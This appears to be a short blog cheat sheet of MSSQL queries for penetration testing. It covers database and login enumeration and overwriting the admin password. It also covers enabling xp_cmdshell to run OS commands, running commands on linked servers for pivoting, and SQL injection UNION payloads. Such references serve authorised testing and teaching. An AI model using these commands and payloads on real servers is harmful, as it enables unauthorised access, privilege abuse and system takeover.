/ Uncategorized / By

Basic MSSQL Navigation & Enumeration

🔹 List all databases

SELECT name FROM master..sysdatabases;

🔹 List all tables in current database

SELECT name FROM sysobjects WHERE type='U';
-- 'U' = user-defined tables

🔹 List all columns in a table

EXEC sp_columns <table_name>;
-- Or:
SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users';

🔹 Switch database

USE <database_name>;

User & Role Enumeration

🔹 Current user and privileges

SELECT SYSTEM_USER;
SELECT USER_NAME();
SELECT IS_SRVROLEMEMBER('sysadmin');  -- Check if user is sysadmin

🔹 List all SQL Server logins

SELECT name, type_desc FROM master.sys.server_principals;

🔹 List users in current DB

SELECT name FROM sysusers;

🔹 List server roles

SELECT * FROM sys.server_role_members;

Querying Data

🔹 Select data from a table

SELECT * FROM users;

🔹 Top N results

SELECT TOP 10 * FROM users;

🔹 Filtered results

SELECT * FROM users WHERE username='admin';

Modifying Data

🔹 Insert data

INSERT INTO users (username, password) VALUES ('hacker', 'p@ssw0rd');

🔹 Update data

UPDATE users SET password='newpass' WHERE username='admin';

🔹 Delete data

DELETE FROM users WHERE username='hacker';

OS Command Execution

🔹 Enable xp_cmdshell (if you have privileges)

EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

🔹 Run system commands

EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'ipconfig';

Linked Server Enumeration (Pivoting)

🔹 List linked servers

EXEC sp_linkedservers;

🔹 Run command on a linked server

EXEC ('EXEC xp_cmdshell ''whoami''') AT [LINKED_SERVER_NAME];

Stored Procedures

🔹 List stored procedures

SELECT name FROM sysobjects WHERE type = 'P';

🔹 Execute stored procedure

EXEC my_procedure_name;

Other Useful Queries

🔹 Current database

SELECT DB_NAME();

🔹 SQL Server version

SELECT @@VERSION;

🔹 Get hostname of the SQL server

SELECT HOST_NAME();

🔹 Get domain and username

SELECT SYSTEM_USER;  -- May return DOMAIN\user

Tip: SQL Injection Friendly Variants

For testing SQLi manually, simpler queries help:

' UNION SELECT null, null, null --  --

Then build up to:

' UNION SELECT 1, SYSTEM_USER, @@version --  --

Related Posts

Scroll to Top